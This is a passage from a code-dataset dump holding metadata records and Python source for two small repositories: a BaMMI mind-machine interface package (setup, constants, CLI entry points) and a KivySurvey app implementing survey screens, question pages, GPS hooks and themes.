len(bts) < num_of_bytes:\n return None\n return struct.unpack(f'{endian}{bytes_format}', bts)[0]\n\n\n" }, { "alpha_fraction": 0.4371165633201599, "alphanum_fraction": 0.5061349868774414, "avg_line_length": 23.148147583007812, "blob_id": "fba76bd6a4c085efb4895c69037fc606ec9d6fd2", "content_id": "525147a616b5d8c622efdc260759b5f0de99bbf5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 652, "license_type": "no_license", "max_line_length": 48, "num_lines": 27, "path": "/setup.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "from setuptools import setup, find_packages\n\n\nsetup(\n name='BaMMI',\n version='0.1.9',\n author='Roy Peleg',\n description='Basic Mind-Machine Interface.',\n packages=find_packages(where='BaMMI'),\n package_dir={\"\": \"BaMMI\"},\n install_requires=[\n 'Click==7.0',\n 'codecov==2.0.16',\n 'Flask==1.1.1',\n 'matplotlib==3.2.1',\n 'numpy==1.22.0',\n 'pika==1.1.0',\n 'Pillow==9.0.1',\n 'protobuf==3.15.0',\n 'pytest==5.3.2',\n 'pytest-cov==2.8.1',\n 'pymongo==3.10.1',\n 'requests==2.23.0'\n ],\n tests_require=['pytest', 'pytest-cov'],\n python_requires='>=3.8',\n)\n" }, { "alpha_fraction": 0.6171875, "alphanum_fraction": 0.71875, "avg_line_length": 30.75, "blob_id": "cceaeb76fd4081e04b251e32bb951a9563bc66e5", "content_id": "d22d9c0fcae79dec1152ebfbc8ed3d140fcb68b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 128, "license_type": "no_license", "max_line_length": 48, "num_lines": 4, "path": "/BaMMI/utils/Constants.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "\nstorage_folder = 'BaMMI/storage'\n\nmongodb_url = \"mongodb://BaMMI:1337@mongo:27017\"\nrabbit_mq_url = 'rabbitmq://rabbitmq:5672/'\n" }, { "alpha_fraction": 0.6057529449462891, "alphanum_fraction": 0.6412859559059143, "avg_line_length": 28.549999237060547, "blob_id": "bd4263419ec866d0961d5d8d8cc326ff8ee7f9fe", "content_id": "e4f970b45ead71897903d1913a87059bd8336962", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 591, "license_type": "no_license", "max_line_length": 81, "num_lines": 20, "path": "/BaMMI/client/__main__.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import sys\nimport click\nfrom .client import upload_sample as upload\nfrom ..utils.CLITemplate import log, main\n\n\[email protected]()\[email protected]('-h', '--host', default='127.0.0.1', type=str)\[email protected]('-p', '--port', default=8000, type=int)\[email protected]('path', default='snapshot.mind.gz', type=click.Path(exists=True))\ndef upload_sample(host='127.0.0.1', port=8000, path='sample.mind.gz'):\n log(upload(host, port, path))\n\n\nif __name__ == '__main__':\n try:\n main(prog_name='client', obj={})\n except Exception as error:\n log(f'ERROR: {error}')\n sys.exit(1)\n" }, { "alpha_fraction": 0.6823204159736633, "alphanum_fraction": 0.6837016344070435, "avg_line_length": 23.965517044067383, "blob_id": "6c507715a8f156acf63c8b4ae17488edddf50126", "content_id": "0ef9d2eefc3334ee61b029136b12b12d7cf23136", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 724, "license_type": "no_license", "max_line_length": 62, "num_lines": 29, "path": "/BaMMI/parsers/__main__.py", "repo_name": "roypel/BaMMI", "src_encoding": "UTF-8", "text": "import sys\nimport click\nfrom . import ParserHandler\nfrom ..utils.CLITemplate import log, main\n\n\nparser_handler = ParserHandler.ParserHandler()\n\n\[email protected]()\[email protected]('parser_name', type=str)\[email protected]('raw_data_path', type=click.Path(exists=True))\ndef parse(parser_name, raw_data_path):\n log(parser_handler.parse(parser_name, raw_data_path))\n\n\[email protected]('run-parser')\[email protected]('parser_name', type=str)\[email protected]('mq_url', type=str)\ndef run_parser(parser_name, mq_url):\n log(parser_handler.run_parser(parser_name, mq_url))\n\n\nif __name__ == '__main__':\n try:\n main(prog_name='parsers', obj={})\n except Exception as error:\n log(f'ERROR: {error}')\n sys.exit(1)\n" } ]
40
chrmorais/KivySurvey
https://github.com/chrmorais/KivySurvey
9eb42accfea5685b2a0bf20a14c2132b832051bf
ca46ed1095908cd362c1eeabc47d3327f1fe79ce
01d651561637c15abd7e94801979d479f748c41b
refs/heads/master
2020-05-29T09:14:08.635116
2014-10-31T19:37:14
2014-10-31T19:37:14
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5227988958358765, "alphanum_fraction": 0.5366561412811279, "avg_line_length": 36.258140563964844, "blob_id": "b37961793b96d24d0127bba7f14b146dd048d513", "content_id": "270825b1b742448bb63548ab5445bc1b4f25d4d2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32041, "license_type": "permissive", "max_line_length": 80, "num_lines": 860, "path": "/kivy_survey/__init__.py", "repo_name": "chrmorais/KivySurvey", "src_encoding": "UTF-8", "text": "from __future__ import unicode_literals, print_function\n__version__ = '0.0.1'\nimport kivy\nfrom flat_kivy import FlatApp, ThemeManager\nfrom kivy.properties import (StringProperty, NumericProperty, ObjectProperty,\n ListProperty, DictProperty, BooleanProperty)\ntry:\n from plyer import gps\nexcept:\n pass\nfrom flat_kivy.ui_elements import (ErrorContent, OptionContent, FlatIconButton, \n FlatLabel)\nfrom surveyquestions import SurveyQuestionNumerical\nfrom kivy.base import EventLoop\nfrom kivy.clock import Clock\nfrom flat_kivy.numpad import DecimalNumPad, NumPad\nfrom flat_kivy.ui_elements import FlatPopup as Popup\nfrom flat_kivy.utils import construct_target_file_name\nfrom kivy.uix.screenmanager import Screen, ScreenManager, SlideTransition\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.event import EventDispatcher\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.button import Button\nfrom flat_kivy.ui_elements import (ButtonBehavior, GrabBehavior, \n TouchRippleBehavior, ThemeBehavior)\nfrom kivy.uix.anchorlayout import AnchorLayout\nfrom dbinterface import DBInterface\nfrom surveyquestions import SurveyQuestion\nfrom survey import Survey\nfrom kivy.storage.jsonstore import JsonStore\nfrom functools import partial\nfrom kivy.lang import global_idmap, Builder\nfrom flat_kivy.font_definitions import style_manager\n\n\n\nclass NavTray(BoxLayout):\n go_back_callback = ObjectProperty(None, allownone=True)\n go_forward_callback = ObjectProperty(None, allownone=True)\n ramp_group_name = StringProperty('navtray_group')\n\n def _go_forward(self):\n go_forward_callback = self.go_forward_callback\n if go_forward_callback is not None:\n go_forward_callback()\n\n def _go_back(self):\n go_back_callback = self.go_back_callback\n if go_back_callback is not None:\n go_back_callback()\n\n\nclass SubjectsLayout(GridLayout):\n subject_id = NumericProperty(None, allownone=True)\n questionnaire = StringProperty(None, allownone=True)\n\n\nclass SurveyHeader(GridLayout):\n subject_id = NumericProperty(None, allownone=True)\n questionnaire = StringProperty(None, allownone=True)\n use_parent_id = BooleanProperty(False)\n\n def on_questionnaire(self, instance, value):\n self.load_headers(self.subject_id)\n\n def on_subject_id(self, instance, value):\n self.load_headers(value)\n \n def load_headers(self, subject_id):\n ksurvey = self.kivysurvey\n headers = ksurvey.get_header_lines()\n db_interface = ksurvey.db_interface\n add_widget = self.add_widget\n if self.use_parent_id:\n try:\n subject_id = ksurvey.previous_subject_ids[-1]\n except:\n pass\n self.clear_widgets()\n for each in headers:\n content = ''\n for header in each:\n if isinstance(header, list):\n content += str(db_interface.get_entry(\n subject_id, header[0], header[1], header[2]))\n else:\n content += header\n content += ' '\n\n if content != '':\n label = FlatLabel(text=str(content))\n \n else:\n label = FlatLabel(text='Error Retrieving Field: ' + \n each[0] + each[1] + each[2])\n label.color_tuple = 
('Gray', '0000')\n add_widget(label)\n\n\nclass SubjectButton(GrabBehavior, TouchRippleBehavior, ButtonBehavior, \n ThemeBehavior, BoxLayout):\n of_interest = BooleanProperty(False)\n color = ListProperty([1., 1., 1., 1.])\n color_down = ListProperty([1., 1., 1., 1.])\n button_fields = ListProperty(None, allownone=True)\n font_color_tuple = ListProperty(['Grey', '1000'])\n color_tuple = ListProperty(['Blue', '500'])\n ripple_color_tuple = ListProperty(['Grey', '0000'])\n style = StringProperty(None, allownone=True)\n font_ramp_tuple = ListProperty(['default', '1'])\n\n\n def __init__(self, **kwargs):\n super(SubjectButton, self).__init__(**kwargs)\n\n def on_color(self, instance, value):\n self.color_down = [x*.7 for x in value]\n \n def on_button_fields(self, instance, value):\n self.clear_widgets()\n for each in value:\n if type(each) is str:\n txt = each\n else:\n txt = str(each)\n l = FlatLabel(text=txt, theme=(b'blue', b'variant_3'), \n color_tuple=self.font_color_tuple, style=self.style,\n )\n l.font_ramp_tuple = self.font_ramp_tuple\n self.bind(font_ramp_tuple=l.setter('font_ramp_tuple'))\n self.bind(font_color_tuple=l.setter('color_tuple'))\n self.bind(style=l.setter('style'))\n \n self.add_widget(l)\n\n\nclass QuestionsLayout(GridLayout):\n subject_id = NumericProperty(None, allownone=True)\n questionnaire = StringProperty(None, allownone=True)\n page = StringProperty(None, allownone=True)\n manual_control = BooleanProperty(False)\n ramp_name = StringProperty('default')\n font_ramp_tuple = ListProperty(['default', '1'])\n\n def __init__(self, **kwargs):\n super(QuestionsLayout, self).__init__(**kwargs)\n Clock.schedule_once(self.setup)\n\n def load_member(self, p_id):\n pass\n\n def on_questionnaire(self, instance, value):\n page = self.page\n if not self.manual_control:\n if page is not None and value is not None:\n self.load_page(str(page), str(value))\n self.load_page_data()\n else:\n self.clear_all()\n\n def clear_all(self):\n for each in self.children:\n each.font_ramp_tuple = ('default', '1')\n self.clear_widgets()\n\n\n def on_page(self, instance, value):\n questionnaire = self.questionnaire\n if not self.manual_control:\n if questionnaire is not None and value is not None:\n self.load_page(str(value), str(questionnaire))\n self.load_page_data()\n else:\n self.clear_all()\n\n def save_page_data(self):\n survey = self.kivysurvey\n db_interface = survey.db_interface\n subject_id = self.subject_id\n page = self.page\n questionnaire = self.questionnaire\n\n if self.check_answers_valid():\n for question in self.children:\n if isinstance(question, SurveyQuestion): \n if not question.disabled:\n question_name = question.question_name\n answer = question.to_json()\n db_interface.set_entry(subject_id, questionnaire, \n page, question_name, answer)\n\n def load_page_data(self):\n ksurvey = self.kivysurvey\n db_interface = ksurvey.db_interface\n page = self.page\n questionnaire = self.questionnaire\n subject_id = self.subject_id\n\n for question in self.children:\n if isinstance(question, SurveyQuestion): \n if not question.disabled:\n question_name = question.question_name\n question.from_json(db_interface.get_entry(subject_id, \n questionnaire, page, question_name))\n question.do_transition = False\n Clock.schedule_once(question._schedule_validate)\n Clock.schedule_once(question._schedule_reset_do_transition)\n\n def setup(self, dt):\n pass\n\n def load_page(self, page_name, questionnaire_name):\n survey = self.kivysurvey.survey\n questionnaire = 
survey.questionnaires[questionnaire_name]\n try:\n page = questionnaire.pages[page_name]\n except:\n page = None\n if page is not None:\n self.clear_all()\n questions = page.questions\n for each in page.question_order:\n question = questions[each]\n wid = question.widget\n print(wid)\n wid.font_ramp_tuple = self.font_ramp_tuple\n self.add_widget(wid)\n\n def check_answers_valid(self):\n answers_valid = True\n db_interface = self.kivysurvey.db_interface\n # verifier = db_interface.verifier\n # verify = verifier.verify\n # raise_error = self.app.root.raise_error\n # for question in self.children:\n # if isinstance(question, SurveyQuestion): \n # if not question.disabled:\n # if question.check_answered():\n # if not verify(\n # question.question_name, question.answer, \n # self.current_individual_id):\n # answers_valid = False\n # raise_error('Answer Not Valid',\n # str(question.answer) + ' is not valid for ' \n # + question.question_text)\n # else:\n # answers_valid = False\n # raise_error('Questions Not Completed',\n # 'You must answer ' + question.question_text)\n return answers_valid\n\n def clear_questions(self):\n self.parent.scroll_to_top()\n for question in self.children:\n if isinstance(question, SurveyQuestion):\n question.clear_question()\n\n\nclass SubjectsScreen(Screen):\n allow_add_subject = BooleanProperty(False)\n add_subject_button = ObjectProperty(None)\n current_subjects = ListProperty(None, allownone=True)\n font_ramp_tuple = ListProperty(['default', '1'])\n field_font_ramp_tuple = ListProperty(['default_field', '1'])\n\n def __init__(self, **kwargs):\n super(SubjectsScreen, self).__init__(**kwargs)\n self.add_subject_button = add_sub = FlatIconButton(\n text='Add Subject',\n size_hint=(1.0, None),\n height=str('80dp'),\n icon='fa-pencil-square',\n theme=(b'blue', b'variant_1'),\n color=(43./255., 153./255., 1.0),\n font_ramp_tuple=self.font_ramp_tuple,\n on_release=self.add_member_callback)\n self.bind(font_ramp_tuple=add_sub.setter('font_ramp_tuple'))\n\n def add_member_callback(self, instance):\n self.kivysurvey.add_member()\n\n \n def on_allow_add_subject(self, instance, value):\n nav_layout = self.ids.navtray.ids.custom\n add_subject_button = self.add_subject_button\n if value and add_subject_button not in nav_layout.children:\n nav_layout.add_widget(add_subject_button)\n \n elif not value and add_subject_button in nav_layout.children:\n nav_layout.remove_widget(add_subject_button)\n\n def on_current_subjects(self, instance, value):\n subjects_layout = self.ids.subjects\n for each in subjects_layout.children:\n each.font_ramp_tuple = ('default', '1')\n subjects_layout.clear_widgets()\n if value is not None:\n for each in value:\n self.add_subject(each)\n\n def add_subject(self, subject_id):\n #get data for displaying\n #create button\n #add button to subjects layout\n subjects_layout = self.ids.subjects\n ksurvey = self.kivysurvey\n db_interface = ksurvey.db_interface\n get_entry = db_interface.get_entry\n survey = ksurvey.survey\n questionnaire = ksurvey.questionnaire\n current_page = ksurvey.current_page.page\n fields = survey.get_subject_fields(questionnaire)\n new_fields = []\n new_fields_a = new_fields.append\n for each in fields:\n if isinstance(each, list):\n new_fields_a(get_entry(subject_id, each[0], each[1], each[2]))\n else:\n new_fields_a(each)\n new_button = SubjectButton(\n on_release=partial(ksurvey.open_member, \n subject_id),\n font_ramp_tuple=self.field_font_ramp_tuple)\n self.bind(field_font_ramp_tuple=new_button.setter('font_ramp_tuple'))\n 
subjects_layout.add_widget(new_button)\n new_button.button_fields = new_fields\n\n\n\nclass QuestionnaireScreen(Screen):\n page = StringProperty(None, allownone=True)\n name = StringProperty('question_screen_group')\n\n\nclass KivySurvey(ScreenManager):\n current_page = ObjectProperty(None, allownone=True)\n current_subjects = ListProperty(None, allownone=True)\n db_interface = ObjectProperty(None)\n subject_id = NumericProperty(None, allownone=True)\n previous_subject_ids = ListProperty(None, allownone=True)\n current_subjects_page = ObjectProperty(None, allownone=True)\n next_page = StringProperty(None, allownone=True)\n prev_page = StringProperty(None, allownone=True)\n survey = ObjectProperty(None)\n current_location = DictProperty({})\n gps_loc_interval = NumericProperty(30.0)\n questionnaire = StringProperty(None, allownone=True)\n top_level_questionnaire = StringProperty(None, allownone=True)\n root = ObjectProperty(None)\n\n def __init__(self, **kwargs):\n global_idmap.update({'kivysurvey': self})\n self.db_interface = DBInterface(self)\n super(KivySurvey, self).__init__(**kwargs)\n self.transition = SlideTransition()\n json = JsonStore(construct_target_file_name('survey.json', __file__))\n for each in json:\n print(each)\n self.survey = Survey(json)\n try:\n gps.configure(on_location=self.receive_gps)\n except:\n pass\n Clock.schedule_once(self.start_gps)\n\n def on_subject_id(self, instance, value):\n self.load_subjects(value, self.questionnaire)\n\n def create_subject(self):\n db_interface = self.db_interface\n uid = db_interface.get_unique_id()\n prev_id = self.previous_subject_ids[-1]\n db_interface.add_subject(prev_id, self.questionnaire, uid)\n return uid\n\n def pop_subjects(self):\n previous_subject_ids = self.previous_subject_ids\n if len(previous_subject_ids) > 0:\n self.subject_id = self.previous_subject_ids.pop()\n else:\n self.subject_id = None\n \n def on_questionnaire(self, instance, value):\n self.load_subjects(self.subject_id, value)\n self.current_subjects_page.allow_add_subject = (\n self.survey.get_allow_add_subjects(value))\n\n def load_subjects(self, subject_id, questionnaire):\n self.current_subjects = self.db_interface.get_subjects(\n subject_id, questionnaire)\n\n def get_header_lines(self):\n return self.survey.get_header_definitions(self.questionnaire)\n\n def set_next_page(self):\n survey = self.survey\n next_page = survey.get_next_page(\n self.questionnaire, self.current_page.page)\n \n if next_page is None:\n return False\n else:\n self.next_page = None\n self.next_page = next_page\n return True\n\n def add_member(self):\n self.transition.direction = 'left'\n self.previous_subject_ids.append(self.subject_id)\n self.subject_id = None\n self.reset_questionnaire()\n\n def open_member(self, member_id, instance):\n self.transition.direction = 'left'\n self.previous_subject_ids.append(self.subject_id)\n self.subject_id = member_id\n self.reset_questionnaire()\n current_page = self.current_page.ids.questions\n current_page.load_page_data()\n\n def reset_questionnaire(self):\n self.current_page.page = None\n self.set_next_page() \n self.swap_pages()\n self.current_page.ids.questions.clear_questions()\n\n def set_prev_page(self):\n survey = self.survey\n prev_page = survey.get_prev_page(\n self.questionnaire, self.current_page.page)\n if prev_page is None:\n return False\n else:\n self.prev_page = prev_page\n return True\n\n def swap_subjects(self):\n 
subjects1 = self.ids.subjects1\n subjects2 = self.ids.subjects2\n current_subjects_page = self.current_subjects_page\n if current_subjects_page is subjects1:\n self.current = 'subjects2'\n self.current_subjects_page = subjects2\n elif current_subjects_page is subjects2:\n self.current = 'subjects1'\n self.current_subjects_page = subjects1\n self.current_subjects_page.allow_add_subject = (\n self.survey.get_allow_add_subjects(self.questionnaire))\n self.current_page.ids.scrollview.scroll_to_top()\n\n def swap_pages(self):\n\n questions1 = self.ids.questions1\n questions2 = self.ids.questions2\n current_page = self.current_page\n if current_page is questions1:\n self.current = 'questions2'\n self.current_page = questions2\n questions1.page = None\n elif current_page is questions2:\n self.current = 'questions1'\n self.current_page = questions1\n questions2.page = None\n self.current_page.ids.scrollview.scroll_to_top()\n\n def on_next_page(self, instance, value):\n questions1 = self.ids.questions1\n questions2 = self.ids.questions2\n current_page = self.current_page\n if current_page is questions1:\n questions2.page = value\n elif current_page is questions2:\n questions1.page = value\n\n def on_prev_page(self, instance, value):\n questions1 = self.ids.questions1\n questions2 = self.ids.questions2\n current_page = self.current_page\n if current_page is questions1:\n questions2.page = value\n elif current_page is questions2:\n questions1.page = value\n\n def start_questionnaire(self, questionnaire):\n self.current_page.page = None\n self.swap_subjects()\n self.questionnaire = questionnaire\n self.set_next_page()\n\n def save_page(self):\n current_page = self.current_page.ids.questions\n current_page.save_page_data()\n\n\n def go_back(self):\n does_page_exist = self.set_prev_page()\n survey = self.survey\n questionnaire = self.questionnaire\n prev_questionnaire = survey.get_previous_questionnaire()\n self.transition.direction = 'right'\n if self.current in ['subjects1', 'subjects2']:\n if prev_questionnaire is None:\n self.app.root.change_screen('cluster', go_back=True)\n return\n else:\n if survey.get_allow_add_subjects(questionnaire):\n self.pop_subjects()\n self.start_questionnaire(survey.pop_previous_questionnaire())\n elif does_page_exist:\n self.swap_pages()\n else:\n if self.subject_id is None:\n self.pop_subjects()\n self.swap_subjects()\n else:\n self.pop_subjects()\n self.swap_subjects()\n\n def go_forward(self):\n does_page_exist = self.set_next_page()\n survey = self.survey\n questionnaire = self.questionnaire\n next_questionnaire = survey.get_next_questionnaire(questionnaire)\n self.transition.direction = 'left'\n if self.current in ['subjects1', 'subjects2']:\n if next_questionnaire is None:\n if survey.get_allow_add_subjects(questionnaire):\n self.pop_subjects()\n prev_questionnaire = survey.pop_previous_questionnaire()\n self.start_questionnaire(prev_questionnaire)\n else:\n if survey.get_allow_forward(questionnaire):\n survey.store_current_questionnaire(questionnaire)\n self.start_questionnaire(next_questionnaire)\n elif does_page_exist:\n self.save_page()\n self.swap_pages()\n else:\n is_creating_subject = False\n if survey.get_allow_add_subjects(questionnaire) and (\n self.subject_id is None):\n self.subject_id = self.create_subject()\n self.save_page()\n if next_questionnaire is None:\n self.pop_subjects()\n prev_questionnaire = survey.pop_previous_questionnaire()\n self.start_questionnaire(prev_questionnaire)\n elif survey.get_allow_add_subjects(next_questionnaire):\n 
survey.store_current_questionnaire(questionnaire)\n self.start_questionnaire(next_questionnaire)\n else:\n self.pop_subjects()\n self.swap_subjects()\n\n def start_gps(self, dt):\n try:\n gps.start()\n except:\n pass\n\n def receive_gps(self, **kwargs):\n if kwargs is not {}:\n self.current_location = kwargs\n gps.stop()\n Clock.schedule_once(self.start_gps, self.gps_loc_interval)\n\n def raise_error(self, error_title, error_text):\n self.app.raise_error(error_title, error_text)\n\n def raise_option_dialogue(self, option_title, option_text, options, \n callback):\n self.app.raise_option_dialogue(option_title, option_text, options,\n callback)\n\n def raise_numpad(self, numpad_title, callback, units=None,\n minimum=None, maximum=None, do_decimal=False):\n self.app.raise_numpad(numpad_title, callback, units, \n minimum, maximum, do_decimal)\n\n\nclass KivySurveyApp(FlatApp):\n kivy_survey = ObjectProperty(None)\n\n def __init__(self, **kwargs):\n\n self.setup_font_ramps()\n super(KivySurveyApp, self).__init__(**kwargs)\n self.setup_themes()\n \n\n def build(self):\n EventLoop.window.bind(on_keyboard=self.hook_keyboard) \n return self.setup_kivy_survey()\n\n def hook_keyboard(self, window, key, *largs):\n if key == 27:\n self.root.go_back()\n return True\n\n def setup_font_ramps(self):\n font_styles = {\n 'Display 4': {\n 'font': 'Roboto-Light.ttf', \n 'sizings': {'mobile': (112, 'sp'), 'desktop': (112, 'sp')},\n 'alpha': .65,\n 'wrap': False,\n }, \n 'Display 3': {\n 'font': 'Roboto-Regular.ttf', \n 'sizings': {'mobile': (56, 'sp'), 'desktop': (56, 'sp')},\n 'alpha': .65,\n 'wrap': False,\n },\n 'Display 2': {\n 'font': 'Roboto-Regular.ttf', \n 'sizings': {'mobile': (45, 'sp'), 'desktop': (45, 'sp')},\n 'alpha': .65,\n 'wrap': True,\n 'wrap_id': '1',\n 'leading': (48, 'pt'),\n },\n 'Display 1': {\n 'font': 'Roboto-Regular.ttf', \n 'sizings': {'mobile': (34, 'sp'), 'desktop': (34, 'sp')},\n 'alpha': .65,\n 'wrap': True,\n 'wrap_id': '2',\n 'leading': (40, 'pt'),\n },\n 'Headline': {\n 'font': 'Roboto-Regular.ttf', \n 'sizings': {'mobile': (24, 'sp'), 'desktop': (24, 'sp')},\n 'alpha': .87,\n 'wrap': True,\n 'wrap_id': '3',\n 'leading': (32, 'pt'),\n },\n 'Title': {\n 'font': 'Roboto-Medium.ttf', \n 'sizings': {'mobile': (20, 'sp'), 'desktop': (20, 'sp')},\n 'alpha': .87,\n 'wrap': False,\n },\n 'Subhead': {\n 'font': 'Roboto-Regular.ttf', \n 'sizings': {'mobile': (16, 'sp'), 'desktop': (15, 'sp')},\n 'alpha': .87,\n 'wrap': True,\n 'wrap_id': '4',\n 'leading': (28, 'pt'),\n },\n 'Body 2': {\n 'font': 'Roboto-Medium.ttf', \n 'sizings': {'mobile': (14, 'sp'), 'desktop': (13, 'sp')},\n 'alpha': .87,\n 'wrap': True,\n 'wrap_id': '5',\n 'leading': (24, 'pt'),\n },\n 'Body 1': {\n 'font': 'Roboto-Regular.ttf', \n 'sizings': {'mobile': (14, 'sp'), 'desktop': (13, 'sp')},\n 'alpha': .87,\n 'wrap': True,\n 'wrap_id': '6',\n 'leading': (20, 'pt'),\n },\n 'Caption': {\n 'font': 'Roboto-Regular.ttf', \n 'sizings': {'mobile': (12, 'sp'), 'desktop': (12, 'sp')},\n 'alpha': .65,\n 'wrap': False,\n },\n 'Menu': {\n 'font': 'Roboto-Medium.ttf', \n 'sizings': {'mobile': (14, 'sp'), 'desktop': (13, 'sp')},\n 'alpha': .87,\n 'wrap': False,\n },\n 'Button': {\n 'font': 'Roboto-Medium.ttf', \n 'sizings': {'mobile': (14, 'sp'), 'desktop': (14, 'sp')},\n 'alpha': .87,\n 'wrap': False,\n },\n }\n for each in font_styles:\n style = font_styles[each]\n sizings = style['sizings']\n style_manager.add_style(style['font'], each, sizings['mobile'], \n sizings['desktop'], style['alpha'])\n\n style_manager.add_font_ramp('1', 
['Display 2', 'Display 1', \n 'Headline', 'Subhead', 'Body 2', 'Body 1'])\n\n def setup_themes(self):\n self.theme_manager.add_theme_type('SubjectButton', SubjectButton)\n variant_1 = {\n 'FlatButton':{\n 'color_tuple': ('LightBlue', '500'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'font_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_duration_in': .1,\n 'ripple_scale': 2.0,\n },\n 'FlatIconButton':{\n 'color_tuple': ('LightBlue', '500'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'font_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_scale': 2.0,\n 'ripple_duration_in': .1,\n 'icon_color_tuple': ('Gray', '1000')\n },\n 'FlatToggleButton':{\n 'color_tuple': ('LightBlue', '500'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'font_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_duration_in': .1,\n 'ripple_scale': 2.0,\n },\n 'FlatCheckBox':{\n 'color_tuple': ('Gray', '0000'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'check_color_tuple': ('LightBlue', '500'),\n 'outline_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_scale': 2.0,\n 'check_scale': .7,\n 'ripple_duration_in': .07,\n 'outline_size': '10dp',\n },\n 'CheckBoxListItem':{\n 'color_tuple': ('Gray', '0000'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'check_color_tuple': ('LightBlue', '500'),\n 'outline_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_scale': 2.0,\n 'check_scale': .7,\n 'ripple_duration_in': .1,\n 'outline_size': '10dp',\n },\n }\n\n variant_2 = {\n 'FlatButton':{\n 'color_tuple': ('Green', '500'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'font_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_duration_in': .1,\n 'ripple_scale': 2.0,\n },\n 'FlatIconButton':{\n 'color_tuple': ('Green', '500'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'font_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_scale': 2.0,\n 'ripple_duration_in': .1,\n 'icon_color_tuple': ('Gray', '1000')\n },\n }\n variant_3 = {\n 'FlatIconButton':{\n 'color_tuple': ('LightBlue', '500'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'font_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_scale': 2.0,\n 'ripple_duration_in': .1,\n 'icon_color_tuple': ('Gray', '1000')\n },\n 'FlatLabel': {\n 'style': 'Display 2',\n 'color_tuple': ('Gray', '1000'),\n },\n 'FlatToggleButton':{\n 'color_tuple': ('LightBlue', '500'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'font_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_duration_in': .1,\n 'ripple_scale': 2.0,\n },\n 'SubjectButton':{\n 'color_tuple': ('LightBlue', '500'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'font_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_duration_in': .1,\n 'ripple_scale': 2.0,\n },\n 'CheckBoxListItem':{\n 'color_tuple': ('LightBlue', '500'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'font_color_tuple': ('Gray', '1000'),\n 'style': 'Display 2',\n 'ripple_scale': 2.0,\n 'ripple_duration_in': .07,\n 'icon_color_tuple': ('Gray', '1000'),\n 'check_color_tuple': ('LightBlue', '500'),\n },\n }\n question_headings = {\n 'FlatLabel': {\n 'style': 'Display 1',\n 'color_tuple': ('Gray', '1000'),\n 'do_resize': False\n },\n }\n position_titles = {\n 'FlatLabel': {\n 'style': 'Display 1',\n 'color_tuple': ('LightBlue', '900'),\n 'do_resize': True\n },\n }\n numpad = {\n 'FlatButton': {\n 'style': 'Display 2',\n 'color_tuple': ('LightBlue', '500'),\n 'ripple_color_tuple': ('Cyan', '100'),\n 'font_color_tuple': ('Gray', 
'1000'),\n 'ripple_scale': 2.0,\n 'ripple_duration_in': .07,\n\n },\n }\n self.theme_manager.add_theme('blue', 'variant_1', variant_1)\n self.theme_manager.add_theme('blue', 'variant_2', variant_2)\n self.theme_manager.add_theme('blue', 'variant_3', variant_3)\n self.theme_manager.add_theme('blue', 'question_headings', \n question_headings)\n self.theme_manager.add_theme('blue', 'position_titles', \n position_titles)\n self.theme_manager.add_theme('blue', 'numpad', numpad)\n\n def setup_kivy_survey(self):\n if __name__ != '__main__':\n self.kivy_survey = survey = Builder.load_file(\n construct_target_file_name('kivysurvey.kv', __file__))\n else:\n self.kivy_survey = survey = KivySurvey()\n survey.current_page = current_page = survey.ids.questions1\n survey.current_subjects_page = survey.ids.subjects1\n db_interface = survey.db_interface\n survey.start_questionnaire('household_questionnaire')\n survey.subject_id = 0\n return survey\n\n\n\nif __name__ == '__main__':\n KivySurveyApp().run()" }, { "alpha_fraction": 0.7264957427978516, "alphanum_fraction": 0.7293447256088257, "avg_line_length": 30.909090042114258, "blob_id": "0eae1d09b6066995dad4cb5ed12bfd610159f2cd", "content_id": "93ec370e189d932d842cf5beb8199bc7b89670fd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 351, "license_type": "permissive", "max_line_length": 75, "num_lines": 11, "path": "/kivy_survey/jsontowidget.py", "repo_name": "chrmorais/KivySurvey", "src_encoding": "UTF-8", "text": "from __future__ import unicode_literals, print_function\nfrom kivy.factory import Factory\n\n\ndef widget_from_json(json_dict):\n\t#Conversion step as python2 kivy does not accept Property names in unicode\n\targs = json_dict['args']\n\tnew_dict = {}\n\tfor each in args:\n\t\tnew_dict[str(each)] = args[each]\n\treturn getattr(Factory, json_dict['type'])(**new_dict)\n" }, { "alpha_fraction": 0.584728479385376, "alphanum_fraction": 0.591942310333252, "avg_line_length": 32.62471389770508, "blob_id": "c4d6bde913657ce0656a07d372a049e0b7a78367", "content_id": "c2ff94cbc599a851b11a35893602ced6b1e77acb", "detected_licenses": [ 